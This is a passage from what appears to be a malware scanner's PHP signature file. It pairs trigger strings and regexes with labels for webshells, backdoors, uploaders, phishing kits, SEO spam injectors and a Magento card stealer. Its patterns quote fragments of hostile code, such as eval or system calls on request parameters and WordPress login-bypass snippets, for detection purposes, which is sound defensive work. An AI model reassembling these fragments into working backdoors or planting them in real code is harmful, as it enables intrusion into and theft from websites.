	'extract($_REQUEST);if(md5($' => array(STR_TRIGGER,
		');include_once $' => array(STR_TRIGGER,
			'){die();}$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.extract.008', 'extract[\s]*\(\$_REQUEST\);[\s]*if[\s]*\(md5[\s]*\(\$[\w]+\)[\s]*!=[\s]*.[^\{]+\)[\s]*\{[\s]*die\(\);[\s]*\}[\s]*\$[\w]+[\s]*\(\$[\w]+,[\s]*\$[\w]+\);[\s]*include_once[\s]*\$[\w]+;'),
		),
	),

	'return "/wp-' => array(STR_TRIGGER,
		'$user_agent = $_SERVER[\'HTTP_USER_AGENT\'];' => array(STR_TRIGGER,
			'$result = file_put_contents($' => array(STR_CLEARFILE, 'php.backdoor.uploader.119', NULL),
		),
	),

	'=\'as\'."s"."er".' => array(STR_TRIGGER,
		'else @unlink(' => array(STR_CLEARFILE, 'php.backdoor.assert.019', NULL),
	),

	'\'a\'.\'ss\'.\'ert\'' => array(STR_TRIGGER,
		'(stripslashes($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.request.005', NULL),
	),

	'array($_POST[' => array(STR_TRIGGER,
		'array_walk($arr,' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.request.007', '\$(\w+)\s*=\s*\$_REQUEST\[.\1.\]\s*;\s*(\$\w+)\s*=\s*array\(\$_POST\[.\w+.\]\s*=>\s*[\'"]\|\.\*\|e[\'"],\);\s*array_walk\(\2,\s*\$\1,\s*[\'"]{2}\)\s*;'),
	),

	'$_REQUEST;' => array(STR_TRIGGER,
		'(\$[\w]+)[\s]*=[\s]*\$_REQUEST;[\s]*\$[\w]+[\s]*=[\s]*\1\[[\w]+\];[\s]*\$[\w]+[\s]*=[\s]*\1\[[\w]+\];[\s]*if\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+\(\$[\w]+\);[\s]*\}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.046', '(\$[\w]+)[\s]*=[\s]*\$_REQUEST;[\s]*\$[\w]+[\s]*=[\s]*\1\[[\w]+\];[\s]*\$[\w]+[\s]*=[\s]*\1\[[\w]+\];[\s]*if\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+\(\$[\w]+\);[\s]*\}'),
	),

	'@array((string)stripslashes(@$_REQUEST[' => array(STR_TRIGGER,
		'@array_diff_ukey(@array((string)@$_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.047', '@array_diff_ukey\(@array\(\(string\)@\$_REQUEST[^;]+@\$_REQUEST\[[^;]+\);'),
	),

	'if(fwrite($f,stripcslashes($_POST["c"]))){' => array(STR_TRIGGER, 
		'$info=\'<a href=\'.\'"\'.$_POST["title"].\'.html\'.\'">\'.$_POST["title"].\'</a></br>\';' => array(STR_CLEARFILE,'php.spam-seo.doorway-gen.030', NULL),
	),

	'var_dump($_REQUEST[' => array(STR_TRIGGER, 
		'\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73' => array(STR_CLEARFILE,'php.backdoor.file_get_contents.042', NULL),
	),

	'<?php echo htmlspecialchars(@$_REQUEST[' => array(STR_TRIGGER,
		'<title>Sage Pay -' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.083.02', NULL),
	),

	'chr(ord(' => array(STR_TRIGGER,
		';forward_static_call_array($' => array(STR_CLEAR_LINEMATCH, 'php.malware.assert.014', '(\$\w)\s*=\s*chr\(\d+(?:\+\d+|\-\d+)?\)\s*;\s*(\$\w+)\s*=\s*chr\(ord\(\1\)\+\d+\)\s*;\s*(\$\w+)\s*=\s*chr\(ord\(\2\)[^\_]+(\$\w+)\s*=\s*\1\.\2\.\2\.\3[^;]+;\s*forward_static_call_array\(\4\s*,\s*array\(\$_REQUEST\[.\w+.\]\)\)\s*;'),
	),

	'if(!$_POST["todir"]) $_POST["todir"] = ".";' => array(STR_TRIGGER,
		'if(!$_REQUEST["myaction"]=="dounzip"){' => array(STR_CLEARFILE, 'php.hacktool.unzip.001', NULL),
	),

	'[md5\'\.]{6,};[\s]*if\(\$[\w]\(\$_REQUEST\[\$[\w]\]\)==.[\w]{25,}.\)\{' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.create_function.012', '(\/\*\w+\*\/\s*)?\$\w+\s*=\s*[\'"]\w+[\'"];\s*\$\w+\s*=\s*[\'"][md5\s*\.\'"]+;\s*if\(\$\w+\(\$_REQUEST\[\$\w+\]\)==[\'"]\w+[\'"]\)\s*{\$\w+\s*=\s*[\'"]\w+[\'"];\$\w+\s*=\s*\$_REQUEST\[\$\w+\]\s*;\$\w+\s*=\s*[base64_dcod\'"\.\$\w\;\s*=]+\$\w+\(\$\w+\)\s*;\s*\$\w+\s*=\s*[\'"create_function\s*;\.]+\$\w+\.=[\'"create_function\s*;\.]+\$\w+\s*=\s*\$\w+\([\'"][\'"],\$\w+\);\$\w+\(\);}(\s*\/\*\w+\*\/)?'),
	'*/stripslashes/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.06', 'eval\/\*.+\(.*?stripslashes.*\(.*?\$_REQUEST.*?\[.*?\].*?\).*?\)'),
	',9,1))],\'-_,\',\'+/=\')));$' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.027', '\$\w\w=.\w{32}.;\$\w\w=.bas.;[^\}]+9,1\)\)\],.-_,.,.\+.=.\)\)\);\$\w\w\(\);\}\}'),
	'$rsa=\'af(!defahed("nums"))' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.jmodule_injector.001', '\$rsa=.af..defah[^\?]+?eate_function.;.\$wel=\$\{[^\?]+?->content.html;\}'),
	'$_REQUEST[fun]($_REQUEST[id_polls' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.request.004', 'if\s*.isset.._REQUEST.id_polls...\s*\{\s*stripslashes.._REQUEST.fun..._REQUEST[^\}]+?}(\s*echo .Good day...<br>.;)?'),
	'$zzj=\'$eleael = tnt_gei(' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.joomla-pharma.001', '\$zzj+=.\$eleael = tnt_gei.+?\'\)\);\@\$\w+\(\);'),
	'REQUEST[\'lel1\']("{$_REQUEST[\'lel2' => array(STR_CLEARFILE, 'php.backdoor.filesman.013', NULL),
	'\$_REQUEST\[\"\w+\"\].\?.\$_REQUEST\[\"\w+\"\]\(\$_REQUEST\[\"\w+\"\]\)' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.request.010', '\$_REQUEST\[\"\w+\"\].\?.\$_REQUEST\[\"\w+\"\]\(\$_REQUEST\[\"\w+\"\]\)'),
	'(\'//e\',${"_REQ' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.pregreplace.019', 'if[^\(]*\(isset[^(]*\(\$\{.[(_REQUST\"\.)]+\}[^}]+[preglac_\"\.]{12,}[^}]+\/\/e[^}]+_R[^)]+\);[^}]*exit;[^}]*\}'),
	'if($cmd != "") print Shell_Exec($cmd);' => array(STR_CLEARFILE, 'php.backdoor.webshell.088', NULL),
	'chmod ($_REQUEST[\'p1\'], $_REQUEST[\'p2\']);' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.004', NULL),
	'$links=$linkProvider->getLinks($_SERVER[\'REQUEST_URI\'],' => array(STR_CLEARFILE, 'php.spam-seo.static_link_provider.001', NULL),
	'INDRAJITH SHELL' => array(STR_CLEARFILE, 'php.backdoor.indrajith.001', NULL),
	'$_SERVER["REQUEST_URI"])){echo"1";exit;}' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.030.02', 'if\s*\(preg_match\(.\/config\/.,\s*\$_SERVER\[.REQUEST_URI.\]\)\)\s*{\s*echo\s*.\d.\s*;\s*exit\s*;\s*}'),
	'$smuri_tmp = smrequest_uri();' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.072', '@set_time_limit[^;]+;[\s]*@ignore_user_abort\(1\);[\s]*\$xmlname[^;]+;[\s]*\$[\w]+[^>]+return \$smuri;[\s]*}[\s]*(\$password[^\x02]+function listDir[^\}]+[\s\}]+closedir[^;]+;[\s\}]+return \$[\w]+;[\s\}]+)?'),
	'RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]' => array(STR_CLEARFILE, 'htaccess.phishing.block_bots.005', NULL),
	'elseif($_REQUEST["myaction"]=="dounzip"):' => array(STR_CLEARFILE, 'php.backdoor.uploader.012', NULL),
	'$b($_REQUEST[\'c\'], $a($_REQUEST[\'d\']));' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.059', NULL),
	'mb_ereg_replace(\'.*\',@$_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.mb_ereg_replace.001', NULL),
	'extract($_REQUEST) && @' => array(STR_CLEAR_LINEMATCH, 'php.malware.extract.002', 'extract\(\$_REQUEST\)[\s]*&&[\s]*@(.?)[\w]+\(stripslashes\(\$[\w]+\)\)[\s]*&&[\s]*exit;'),
	'@extract[\s]*\(\$_REQUEST\);[\s]*@die[\s]*\(\$[\w]+\(\$[\w]+\)\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.extract.007', '@extract[\s]*\(\$_REQUEST\);[\s]*@die[\s]*\(\$[\w]+\(\$[\w]+\)\);'),
	'<?php extract($_REQUEST) && @$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.041', 'extract\(\$_REQUEST\) && @\$[\w]+\([^;]+;'),
),

'$_GE' => array(STR_TRIGGER,

	'$_GET[' => array(STR_TRIGGER, 

		'isset' => array(STR_TRIGGER,  
	
			'multipart/form-data' => array(STR_TRIGGER,
	
				'.php_uname().' => array(STR_TRIGGER,
					';if($_POST["v"]==up){if(@copy($_FILES[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.051', 'if[\s]*\(isset[\s]*\(\$_GET\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*echo.[^;]+;[\s]*echo.<form[^;]+;[\s]*echo.<input[^\?]+echo[^;]+;[\s\}]+'),
					']==up){if(@copy($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.366', NULL),
				),

				'Not Found' => array(STR_TRIGGER,
					'<address>Apache Server' => array(STR_TRIGGER,
						'move_uploaded_file($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.339', NULL),
					),
				),
			),
	
			'@error_reporting(0);' => array(STR_TRIGGER,
				'eval(base64_decode(' => array(STR_TRIGGER,
					'echo base64_decode' => array(STR_CLEARFILE, 'php.backdoor.webshell.070', NULL),
				),
			),
		
			'$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input)' => array(STR_TRIGGER,
				'return urldecode($output)' => array(STR_TRIGGER,
					'@$config[\'init\']($config[\'request\']' => array(STR_CLEARFILE, 'php.backdoor.assert.028', NULL),
				),
			),
	
			'@chmod($filetemp,0755);' => array(STR_TRIGGER,
				'$filetemp = \'./wp-admin/' => array(STR_CLEARFILE, 'php.backdoor.chmod.002', NULL),
			),
	
			'(isset($_GET["cookie"]))' => array(STR_TRIGGER,
				'echo \'cookie=' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.012', 'if[\s]*\(isset\(\$_GET\["cookie"\]\)\)[\s]*\{[\s]*echo .cookie=[^}]+\}'),
			),
	
			'$creds[\'remember\']' => array(STR_TRIGGER,
				'mysql[\w\->]+\(.UPDATE[\s]*\{\$table_prefix\}users[\s]*SET[\s]*user_pass[\s]*=[\s]*.\{\$[\w]+\}.[\s]*WHERE[\s]*ID[\s]*=[\s]*.\{\$[\w]+\}..\);?' => array(REX_CLEARFILE, 'php.hacktool.wp_users.009', NULL),
			),
	
			'function getHost($url) {' => array(STR_TRIGGER,
				'if(is_dir($tdir.$sd) and substr($sd' => array(STR_CLEARFILE, 'php.hacktool.directory_scanner.002', NULL),
			),
	
			'eval($_GET[' => array(STR_TRIGGER,
				'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET[^\]]+\][\s\)]+\{[\s]*eval[\s]*\([\s]*\$_GET\[[^\)]+\);[\s]*(die[^;]*;[\s]*)?\}' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_GET.001', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET[^\]]+\][\s\)]+\{[\s]*eval[\s]*\([\s]*\$_GET\[[^\)]+\);[\s]*(die[^;]*;[\s]*)?\}'),
			),
	
			'} catch (Exception $' => array(STR_TRIGGER,
				'&& is_file($f)) { require_once($f); die; }' => array(STR_CLEAR_MULTIMATCH, 'php.malware.require_once-injection.010', 'try[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.{10,200};[\s]*if\(isset\(\$_GET\[.[\w]+.\]\)[\s]*&&[\s]*is_file\(\$[\w]+\)\)[\s]*\{[\s]*require_once\(\$[\w]+\);[\s]*die;[\s]*\}[\s]*\}[\s]*catch[\s]*\(Exception[\s]*\$[\w]+\)[\s]*\{\}'),
			),
	
			'if(isset($_GET[' => array(STR_TRIGGER,
				'\]\)\)\{ include\([\'"]\/(home|var|root)' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.027', 'if\(isset\(\$_GET\[[\'"]\w+[\'"]\]\)\){\s*include\([\'"]\/(home|var|root)\/[\w\/\.\-]+[\'"]\);\s*exit;\s*}'),
			),

			'UEQ5d2FIQUtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBrWnBiR1VnVlhCc2IyRmtaWElnWW5rZ1JH' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.011', '\${base64_decode\(.R0xPQkFMUw==.\)\s*}\s*\[base64_decode\([^\$]+\$_GET\[base64_decode\([^\&]+\&\&\$_GET\[base64_decode\([^;]+;\${base64_decode[^{]+{\${base64[^{]+{\${base64[^{]+{\$\w+}[^}]+}\[base64[^}]+}\s*\(base64_decode\(.UEQ5d2FIQUtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBrWnBiR1VnVlhCc2IyRmtaWElnWW5rZ1JH[^\)]+\)\)\s*;\s*exit\s*;\s*}'),
		),

		'include' => array(STR_TRIGGER,

			'include \'wp-config.php\';' => array(STR_TRIGGER,
				'$redirect_to=user_admin_url();' => array(STR_TRIGGER,
					'$user = get_user_by( \'id\', $_GET[\'id\'] );' => array(STR_TRIGGER,
						'$user_id = $_GET[\'id\'];' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.009', NULL),
					),
				),
			),

			'/wp-load.php\';' => array(STR_TRIGGER,
				'$id = $_GET[\'id\']' => array(STR_TRIGGER,
					'wp_set_auth_cookie($id)' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.004', NULL),
				),
			),

			'document.getElementById("<?echo $' => array(STR_TRIGGER,
				'window.onload = function()' => array(STR_TRIGGER,
					'(event.keyCode<48' => array(STR_CLEARFILE, 'php.phishing.generic.082', NULL),
				),
			),

			'ini_restore(' => array(STR_TRIGGER,
				'ini_get(' => array(STR_TRIGGER,
					'echo ini_get(“safe_mode”);' => array(STR_CLEARFILE, 'php.malware.include.070', NULL),
				),
			),

            'include("wp-config.php");' => array(STR_TRIGGER,
                '= wp_insert_post( $' => array(STR_CLEARFILE, 'php.backdoor.wp-posts.003', NULL),
            ),

			'(\$\w+)\s*=\s*\$_GET\[.\w+.\];\s*include\s*\(\1\);' => array(REX_CLEAR_MULTIMATCH, 'rex.include_GET.001', '(\$\w+)\s*=\s*\$_GET\[.\w+.\];\s*include\s*\(\1\);'),
			'header("Location: ".$link."?".$_SERVER[\'QUERY_STRING\']);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.086', NULL),
			'<title>Sign in to your account </title>' => array(STR_CLEARFILE, 'php.phishing.microsoft.003', NULL),
		),

		'echo"<br><form method=post enctype=multipart/' => array(STR_TRIGGER,

			'id=k value=upload><br>";' => array(STR_TRIGGER,
			
				'echo "Uname :";' => array(STR_TRIGGER,
					'echo print Shell_Exec(\'uname -a\');' => array(STR_CLEARFILE, 'php.backdoor.uploader.215.03', NULL),
				),
	
				'>404' => array(STR_TRIGGER,
					'$disable_functions = @ini_get("disable_functions");' => array(STR_CLEARFILE, 'php.backdoor.uploader.215.04', NULL),
				),
	
				'$disable_functions = @ini_get("disable_functions");' => array(STR_TRIGGER,
					'Gagal' => array(STR_CLEARFILE, 'php.backdoor.uploader.215.02', NULL),
				),

				'php_uname()' => array(STR_TRIGGER,
					'echo"<font color=#ffffff>".php_uname()."";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.215.05', 'if\(isset\(\$_GET\[[^\{]+\{[\s]*echo[\s]*.<font[^\}]+\}[\s]*else[\s]*\{[\s]*echo[^\}]+[\s\}]+'),
				),

				'echo "<br>DisablePHP=".' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.397', 'if\(isset\(\$_GET\[\"\w+\"\]\)\)\s+\{\s+echo\"<font.color=\w+>\"\.php_uname\(\)\.\"\";\s+print.".n.;\$disable_functions[^;]*?;\s+echo..<br>[D,d]isablePHP[^;]*?;.print[^;]*?;\s+[^!]*?!!!\";\s+\}\s+\}\s+\}'),
				'id=k value=upload><br' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.215', 'if\(isset\(\$_GET\[.\w+.\]\)\)\s*\{\s*echo.<br><form[^>]+>.;\s*echo.<input\s*type=file\s*name=\w><input\s*name=(\w)\s*type=submit\s*id=\1\s*value=upload><br>.;'),
			),
		),

		'!empty($_GET[' => array(STR_TRIGGER,
			'echo' => array(STR_TRIGGER,

				'error_reporting(' => array(STR_TRIGGER,
					'$spc = array(\'<\', \'>\', \'&\')' => array(STR_CLEARFILE, 'php.backdoor.injector.112', NULL),
					'echo \'[Successfuly_Added] http://\' . $_SERVER[\'HTTP_HOST\'] . \'/wp-config.php\'' => array(STR_CLEARFILE, 'php.spam-seo.injector.265', NULL),
					'.urlencode($_SERVER[\'REMOTE_ADDR\']).\'&siteurl=\'.urlencode(get_site_url());$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.265.02', 'ini_set\([^;]+;\s*ini_set\([^;]+;\s*error_reporting\([^;]+;\s*if\(\!class_exists\([^\/]+\/.x08UA-.d{\d+,\d+}-.d{\d+,\d+}[^;]+;\s*}\s*if\(\!function_exists\(.is_user_logged_in.\)\|+is_user_logged_in\(\)[^\?]+\?trim\(\$_SERVER\[.HTTP_USER_AGENT.\]\)[^_]+_SERVER\[.HTTP_X_DEVICE_USER_AGENT[^\^]+urlencode\(\$_SERVER\[.REMOTE_ADDR.\]\)\.\'\&\s*siteurl=.\.urlencode\(get_site_url\(\)[^\?]+add_action\(.shutdown.,array\([^;]+;\s*}'),
				),

				'])?$_GET[' => array(STR_TRIGGER,
					')){echo' => array(STR_TRIGGER,
						']:\'\';if(!empty($' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.082', '\$[\w]+[\s]*=[\s]*!empty\(\$_GET\[[^\]]+\]\)\?\$_GET\[[^\]]+\]:..;if\(!empty[^}]+;\}'),
					),
				),

				'copy($_FILES[' => array(STR_TRIGGER,
					'HTTP_DZMVWHBPQ' => array(STR_CLEAR_MULTIMATCH, 'php.malware.copy.004', 'if\(!empty\(\$_GET\[.[\d]+.\]\)\)[\s]*\{[\s]*@copy\(\$_FILES\[.[\w]+.\][\s]*\[.[\w]+.\][\s]*,[\s]*\$_SERVER\[.HTTP_[\w]+.\]\);[\s]*echo[\s]*[\d]+;[\s]*exit;[\s]*\}'),
				),
			),
		),

		'copy(' => array(STR_TRIGGER,

			'eval(base64_decode' => array(STR_TRIGGER,
				'));exit;}(@copy($_FILES[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.049', 'error_reporting\(\d+\)\s*;\s*(\$\w+)\s*=\s*\$_GET\[.\w+.\]\s*;\s*if\s*\(\s*isset\s*\(\s*\1\s*\)\s*\&{0,3}\s*\!\s*empty\s*\(\s*\1\s*\)\s*\)\s*{\s*eval\s*\(\s*base64_decode\s*\(\s*\1\s*\)\s*\)\s*;\s*exit\s*;\s*}\s*\(\s*\@\s*copy\s*\(\$_FILES\[[^,]+,\s*\$_FILES\[[^\)]+\)\s*\)\s*;'),
			),

			'if\s*\(\s*copy\(\$_GET\[.[^\]]+\],\s*\$_GET\[.[^\]]+\]\s*\)\s*\)\s*echo[^;]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.copy_GET.001', 'if\s*\(\s*copy\(\$_GET\[.[^\]]+\],\s*\$_GET\[.[^\]]+\]\s*\)\s*\)\s*echo[^;]+;'),
			'$_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Complate !!!</b><br>\'; } echo \'<form action=' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.017', '(?:if\(\$_GET\[.\w+.\]\s*=[^\)]+\)\s*{)?\s*if\(\s*\@copy\(\s*\$_FILES\[[^{]+{\s*echo\s*.(?:<b>)?[Uu]pload[^}]+}\s*echo\s*[\'"]\s*<form\s*action[^;]+;(?:\s*})?'),
			'<title>SPYUS MAILER' => array(STR_CLEARFILE, 'php.mailer.POST.042', NULL),
			'print "--> " . $file' => array(STR_CLEARFILE, 'php.malware.copy.005', NULL),
		),

		'header(\'Location:' => array(STR_TRIGGER,
		
			'= isset($_SERVER[\'HTTP_USER_AGENT\']) ? strtolower($_SERVER[\'HTTP_USER_AGENT\'])' => array(STR_TRIGGER,
				'header(\'Location: \'.$location,' => array(STR_CLEARFILE, 'php.spam-seo.header_location.030', NULL),
			),

			'$ua = $_SERVER[\'HTTP_USER_AGENT\'];' => array(STR_TRIGGER,
				'if (preg_match(\'/facebook/s' => array(STR_CLEARFILE, 'php.malware.redirect.031', NULL),
			),

			'<?php header(\'Location: \'.$_GET[' => array(STR_CLEAR_LINEMATCH, 'php.malware.redirect.011', '<\?php\s*header\(\'Location:\s*\'\.\$_GET\[\'\w{1,2}\'\]\);\s*\?>'),
		),

		'<?php system($_GET' => array(STR_TRIGGER, 
			'<\?php\s+system\(\$_GET\[[^;]+;\s+\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.system_GET.001', '<\?php\s+system\(\$_GET\[[^;]+;\s+\?>'),
		),

		'29207b0a406576616c286261736536345f646563' => array(STR_TRIGGER,
			'if\(\$_GET\[[^\]]+\][\s]*==[\s]*[\d]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\'\. creat_funio]+;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.pack.002', 'if\(\$_GET\[[^\]]+\][\s]*==[\s]*[\d]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\'\. creat_funio]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(..,[\s]*pack\(.H\*.,[\s]*.6966[^;]+\);[\s]*\$[\w]+\(..\);[\s]*exit[^;]*;[\s]*\}'),
		),

		']])){if(strstr($' => array(STR_TRIGGER,
			']], "@")){echo $' => array(STR_CLEARFILE, 'php.hacktool.generic.024', NULL),
		),

		'error_reporting(' => array(STR_TRIGGER,
			'@error_reporting\([\d]+\);[\s]*@ini_set\(.display_errors[^;]+;[\s]*@ini_set\(.error_log[^\)]+\);[\s]*(exec|system)\(\$_GET\[.[\w]+.\]\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.generic.084', '@error_reporting\([\d]+\);[\s]*@ini_set\(.display_errors[^;]+;[\s]*@ini_set\(.error_log[^\)]+\);[\s]*(exec|system)\(\$_GET\[.[\w]+.\]\);'),
		),

		'scandir(' => array(STR_TRIGGER,
			'deleteDir($dir.\'/\'.$indv_file1);' => array(STR_CLEARFILE, 'php.hacktool.generic.028', NULL),
		),

		'md5($_GET[' => array(STR_TRIGGER,
			'substr(dirname(__FILE__), 0 , strrpos(dirname(__FILE__),' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.060', NULL),
		),

		'echo' => array(STR_TRIGGER,
			's\'.\'y\'.\'s\'.\'t\'.\'e\'.\'m' => array(STR_CLEARFILE, 'php.backdoor.system.022', NULL),
		),

		'header("Location: loginprodx.php?$md5' => array(STR_CLEARFILE, 'php.phishing.redirect.024', NULL),
		'){header("Location: ".pack(' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.header_location.026', '<\?php\s*\$\w+\s*=\s*\$_GET\[.\w+.\]\s*;\s*if\(\$\w+\){header\s*\(.Location:\s*.\.pack\(.\w+\*.\s*,\s*\$\w+\)\);\s*exit\(\);\s*}\s*\?>'),
		'if(in_array($geoplugin->countryCode,$whitelisted)) {' => array(STR_CLEARFILE, 'php.phishing.redirect.033', NULL),
		'<title>WeTra?nsfer(\.com|)' => array(REX_CLEARFILE, 'php.phishing.WeTransfer.001', NULL),
		'(substr($_COOKIE[0],1)));$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.COOKIE_eval.008', '\$[\w]+[\s]*=[\s]*\$_GET\[[\d]+\];\$[\w]+[\s]*==[\s]*[\w]+\&\&[\s]*[\w]+\([\w]+\(substr\(\$_COOKIE\[[\d]*\],[\d]*\)\)\);\$[\w]+[\s]*==[\s]*[\w]+\&\&die\(\);'),
		'table_schema=database() AND TABLE_NAME LIKE \'%options\';";' => array(STR_CLEARFILE, 'php.backdoor.wpuser.006', NULL),
		'tidioelements.com' => array(STR_CLEARFILE, 'php.malware.injector.080', NULL),
	),

	'= getcwd()' => array(STR_TRIGGER,

		'rrmdir($dir)' => array(STR_TRIGGER,
			'All Files/Folders' => array(STR_CLEARFILE, 'php.hacktool.mass-delete.002', NULL),
		),

		'return preg_replace("/(<.*?body.*?>)/i", "' => array(STR_CLEARFILE, 'php.spam-seo.injector.222', NULL),
		'echo \'Zip Created, bhaens' => array(STR_CLEARFILE, 'php.backdoor.webshell.132', NULL),
	),

	'echo ini_get("safe_mode");' => array(STR_TRIGGER,
		'echo ini_get("open_basedir");' => array(STR_TRIGGER,
			'include($_GET["file"' => array(STR_CLEARFILE, 'php.backdoor.lolshell.001', NULL),
			'include($_GET["oscey"' => array(STR_CLEARFILE, 'php.backdoor.lolshell.001.02', NULL),
			'$filecwd = $_POST[\'filecwd\'];' => array(STR_CLEARFILE, 'php.backdoor.lolshell.001.03', NULL),
		),
	),

	'OR(isset($_GET["z"])))' => array(STR_TRIGGER,
		'$i=strrev("uoy yb dekcah");' => array(STR_CLEARFILE, 'php.defaced.hacked_by_you.001', NULL),
		'OR(isset($_GET["z"])))' => array(STR_CLEAR_LINEMATCH, 'php.defaced.generic.001', '(error_reporting.0.;\s*)?\$r=\$_SERVER[^;]+;if..preg_match[^\}]+?echo\s[^;]+(h|H)(a|A)(c|C)(K|k)(E|e)(d|D)[^\n]+exit;\}'),
	),

	'function start_work($off, $unto)' => array(STR_TRIGGER,
		'$url = "http://$domen/"."$path"."/1/$i.php";' => array(STR_CLEARFILE, 'php.spam-seo.injector.159.04', NULL),
	),

	'sitemaps.org' => array(STR_TRIGGER,
		'$request_url=isset($_GET[\'url\'])?$_GET[\'url\']:\'\';' => array(STR_CLEARFILE, 'php.spam-seo.sitemap_doorway.003', NULL),
	),

	'if (isset($_GET[\'jpg\']))' => array(STR_CLEARFILE, 'php.spam-seo.header_location.009', NULL),
	'usort($_GET,' => array(STR_CLEAR_LINEMATCH, 'php.malware.usort.001', 'usort\(\$_GET,.[(?:assert\s*\.\')]+;'),
	'"])) header("\x4c\157\x63\141\x74\151\x6f\156\x3a\40\x68\164\x74' => array(STR_CLEARFILE, 'php.redirect.header_location.026', NULL),
	'<?=`$_GET[cmd' => array(STR_CLEARFILE, 'php.backdoor.generic.059', NULL),
	'bHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.022','if.isset.\$_GET."[^"]+"]...\$[\w]+=array."[\w]+"=>[^)]+\);\$[\w]+="[^"]+";[^}]+\)\);\$[\w]+\(\);\}[\s]*'),
	']($_GET[w]):\'\';' => array(STR_CLEAR_LINEMATCH,'php.backdoor.generic.014', 'isset.._GET.[\\w]+...._GET.[\\w]+..._GET.[\\w]+..:\'\';'),
	'aXNzZXQoJF9HRVRbJ2xvYWRiZWFuJ10p' => array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.002.002', '<\?php\s+if.isset.\$_GET\[\"[^>]+?aXNzZXQoJF9HRVRbJ2xvYWRiZWFuJ10[^>]+?_theme\(\);\}\?>'),
	'echo "<span class=\'red\'>$f</span> Emails Founded. Check <span class=\'red\'>".htmlspecialchars($_GET[\'name' => array(STR_CLEARFILE, 'php.hacktool.mailstealer.001', NULL),
	'$_GET[\'f\']($_GET[\'a\'],\'lol.php\'); die(); }' => array(STR_CLEARFILE, 'php.backdoor.generic.033', NULL),
	'Mage::getModel(\'admin/user\')->load($_GET[\'user_id\'' => array(STR_CLEARFILE, 'php.backdoor.magento-login.001', NULL),
	'include("/tmp/".$_GET[my]);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.031', 'error_reporting\(0\);[\s]*include\(".tmp."\.\$_GET\[my\]\);|include\(".tmp."\.\$_GET\[my\]\);'),
),

'header(' => array(STR_TRIGGER,

	'header("location:' => array(STR_TRIGGER,

		'gethostbyaddr($_SERVER[\'REMOTE_ADDR' => array(STR_TRIGGER,

			'403 Forbidden' => array(STR_TRIGGER,
				'$blocked_words = array(' => array(STR_CLEARFILE, 'php.phishing.block_bots.009', NULL),
			),

			'window.location.replace(' => array(STR_TRIGGER,
				'$blocked_words =' => array(STR_CLEARFILE, 'php.phishing.block_bots.011', NULL),
			),
		),

